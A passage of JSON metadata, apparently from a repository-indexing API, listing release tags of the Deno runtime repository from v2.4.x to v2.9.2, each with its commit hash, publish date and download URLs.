sitories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.